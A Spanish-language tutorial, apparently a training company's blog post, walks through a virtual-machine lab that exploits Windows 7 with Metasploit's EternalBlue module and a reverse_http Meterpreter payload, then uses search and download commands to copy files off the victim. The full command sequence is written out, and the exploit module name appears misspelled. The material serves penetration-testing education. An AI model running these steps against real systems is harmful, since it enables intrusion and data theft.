El siguiente tutorial sobre cómo realizar una exfiltración de datos con Meterpreter está hecho con fines académicos. El propósito de la técnica que veremos a continuación es poner a prueba la seguridad de un sistema y entender cómo actúa un hacker malicioso.
Antes de saber cómo realizar una exfiltración de datos con Meterpreter
El hacking es un procedimiento con diferentes etapas. Cada una de ellas requiere distintas técnicas y herramientas que pueden utilizarse para hacer una prueba de penetración o pentest.
El pentesting consiste en simular un ciberataque de forma controlada en un sistema para encontrar y poner a prueba sus vulnerabilidades. Una de las fases finales y de las más interesantes en un ejercicio de pentesting es la postexplotación.
La explotación es el proceso de utilizar los fallos informáticos de un sistema como puerta de entrada para el mismo.
Por lo tanto, la postexplotación consiste en todas aquellas tareas que se realizan en el ordenador del objetivo, una vez ya se encuentra comprometido. En este fase, se suele utilizar un tipo de código que se conoce como payload.
Un payload es el código que ejecuta tareas malignas en el ordenador de la víctima de un ciberataque. Este código se inyecta en la máquina vulnerada durante la fase de postexplotación. Un payload puede ser simple o avanzado y permite ejecutar tareas como:
- Exfiltración de datos.
- Subir y descargar archivos.
- Propagar malware.
- Ejecutar comandos en la consola.
- Conectarse al servidor de una botnet.
En este post, te explicaremos cómo replicar una técnica de postexplotación en un laboratorio con máquinas virtuales. A continuación, veremos cómo ejecutar una exfiltración de datos con Meterpreter.
Exfiltración de datos con Meterpreter
Meterpreter es un payload desarrollado para ejercicios de pentesting que permite tener acceso remoto a la máquina comprometida. Su código opera a muy bajo nivel y, por lo tanto, es muy difícil de detectar. A continuación, veremos cómo se puede usar para hacer una exfiltración de datos con Meterpreter.
Preparación del laboratorio
🔴 ¿Quieres entrar de lleno a la Ciberseguridad? 🔴
Descubre el Ciberseguridad Full Stack Bootcamp de KeepCoding. La formación más completa del mercado y con empleabilidad garantizada
👉 Prueba gratis el Bootcamp en Ciberseguridad por una semanaEl primer paso para este ejercicio es crear un laboratorio con dos máquinas virtuales. Para construirlas y ponerlas a funcionar, utiliza el software de virtualización de tu preferencia.
- Crea una máquina virtual con sistema operativo Kali Linux.
- Crea una máquina virtual con sistema operativo Windows 7 (elige la versión más antigua que te permita).
Recuerda escoger el modo de red NAT para ambas máquinas, para que no utilicen la dirección IP de tu router real, pero igualmente tengan acceso a internet.
Procedimiento
Una vez tengas instaladas las dos máquinas virtuales, dirígete a la que tiene el sistema Kali Linux para ejecutar el laboratorio de exfiltración de datos con Meterpreter.
- Para abrir la consola de Metasploit, ejecuta el comando:
msfconsole
- Para elegir el exploit que vamos a utilizar, ejecuta:
use exploit/windows/smb/ms_010_eternalblue
- Usaremos el exploit EternalBlue, que utiliza una vulnerabilidad del servidor de Microsoft Server Message Block, para infiltrarse en el ordenador. No obstante, aún nos falta configurar el payload que nos permitirá ejecutar cualquier tarea en la máquina objetivo. Para ello, ejecuta el comando:
set payload windows/x64/meterpreter/reverse_http
- Finalmente, tendrás que asignarle valores a dos variables obligatorias. Si deseas ver cuáles son, ejecuta el comando:
show options
- Al hacerlo, verás que es necesario asignarle valores a las variables LPORT (puerto local de la máquina de Kali) y RHOSTS (dirección IP de la máquina con Windows 7). Para asignar estos valores, ejecuta los comandos:
set LPORT <cualquier puerto de la máquina de Kali, ej. 4444> set RHOST <IP de la máquina con Windows 7>
- En un ejemplo con valores ficticios, los comandos se verían así:
set LPORT 4444 set RHOSTS 192.168.172.128
- Para ejecutar el exploit con el payload, ejecuta el comando:
exploit
Comandos de Meterpreter
Después de seguir los pasos anteriores, habrás ejecutado el payload de Meterpreter y tendrás acceso remoto a la máquina de Windows 7. Para realizar la exfiltración de datos con Meterpreter, tendrás que aprender algunos comandos básicos para utilizarlo.
- help: el comando “help”, al igual que en la mayoría de programas, te enseñará la lista de comandos de este payload (que es bastante extensa). Échale un vistazo antes de comenzar la postexplotación.
- sysinfo: para obtener información básica del equipo.
- ipconfig: para obtener todas sus direcciones IP.
- ps: para ver toda la lista de procesos que están corriendo actualmente en la máquina, junto con información sobre qué usuario lo ejecutó y con qué nivel de privilegios.
- getuid: para conocer el nivel de privilegios con el que se está ejecutando el payload. El payload siempre se ejecutará con el nivel de privilegios con el que se haya ejecutado el software vulnerable explotado.
Los comandos más útiles para realizar una exfiltración de datos con Meterpreter son:
- search: permite buscar cualquier fichero con cualquier formato.
- upload: permite subir cualquier fichero al ordenador.
- download: permite descargar cualquier archivo existente en el ordenador y hacer una copia de él en tu máquina de Kali.
Ya sabes cómo ejecutar una exfiltración de datos con Meterpreter para un ejercicio de pentesting. Si quieres aprender más sobre técnicas de postexplotación, te interesará nuestro Bootcamp de Ciberseguridad, una formación intensiva tanto teórica como práctica con la que te especializarás en pocos meses. ¡Solicita información e impulsa tu vida profesional ahora!